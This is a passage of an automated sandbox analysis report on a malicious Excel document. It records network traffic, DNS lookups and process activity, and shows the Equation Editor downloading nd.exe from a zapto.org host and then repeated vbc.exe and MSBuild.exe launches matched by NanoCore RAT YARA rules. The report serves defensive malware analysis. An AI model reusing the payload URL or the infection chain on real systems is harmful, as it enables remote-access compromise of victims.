                            May 3, 2021 14:55:42.425761938 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425770044 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425786972 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425789118 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425805092 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425812006 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425826073 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425837994 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425843000 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425854921 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425858974 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425878048 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425880909 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425894976 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:42.425904036 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425925970 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.425959110 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:42.624288082 CEST8049165172.245.45.28192.168.2.22

                            UDP Packets

                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            May 3, 2021 14:55:40.334424973 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                            May 3, 2021 14:55:40.393349886 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22

                            DNS Queries

                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                            May 3, 2021 14:55:40.334424973 CEST | 192.168.2.22 | 8.8.8.8 | 0xccae | Standard query (0) | myhostisstillgood11.zapto.org | A (IP address) | IN (0x0001)

                            DNS Answers

                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                            May 3, 2021 14:55:40.393349886 CEST | 8.8.8.8 | 192.168.2.22 | 0xccae | No error (0) | myhostisstillgood11.zapto.org | | 172.245.45.28 | A (IP address) | IN (0x0001)

                            HTTP Request Dependency Graph

                            • myhostisstillgood11.zapto.org

                            HTTP Packets

                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            0 | 192.168.2.22 | 49165 | 172.245.45.28 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            Timestamp | kBytes transferred | Direction | Data
                            May 3, 2021 14:55:40.605653048 CEST | 0 | OUT | GET /dashboard/docs/images/nd.exe HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                            Host: myhostisstillgood11.zapto.org
                            Connection: Keep-Alive
                            May 3, 2021 14:55:40.807997942 CEST | 2 | IN | HTTP/1.1 200 OK
                            Date: Mon, 03 May 2021 12:55:40 GMT
                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
                            Last-Modified: Mon, 03 May 2021 07:04:16 GMT
                            ETag: "923fb-5c16791e13768"
                            Accept-Ranges: bytes
                            Content-Length: 599035
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: application/x-msdownload


                            Code Manipulations

                            Statistics

                            CPU Usage

                            Memory Usage

                            High Level Behavior Distribution

                            Behavior

                            System Behavior

                            General

                            Start time:14:54:43
                            Start date:03/05/2021
                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            Wow64 process (32bit):false
                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                            Imagebase:0x13fb60000
                            File size:27641504 bytes
                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:14:55:04
                            Start date:03/05/2021
                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            Wow64 process (32bit):true
                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                            Imagebase:0x400000
                            File size:543304 bytes
                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:14:55:08
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:low

                            General

                            Start time:14:55:09
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0xf00000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:moderate

                            General

                            Start time:14:55:14
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:low

                            General

                            Start time:14:55:17
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x1340000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:moderate

                            General

                            Start time:14:55:22
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:low

                            General

                            Start time:14:55:23
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x1340000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:moderate

                            General

                            Start time:14:55:28
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:low

                            General

                            Start time:14:55:29
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x70000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:14:55:33
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:low

                            General

                            Start time:14:55:35
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0xa00000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:moderate

                            General

                            Start time:14:55:40
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:low

                            General

                            Start time:14:55:42
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0xa00000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:moderate

                            General

                            Start time:14:55:47
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:low

                            General

                            Start time:14:55:48
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x360000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:14:55:53
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:55:55
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x10a0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Start time:14:56:00
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:01
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x10a0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:07
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:08
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x11f0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:13
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:15
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x11f0000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                            General

                            Start time:14:56:20
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
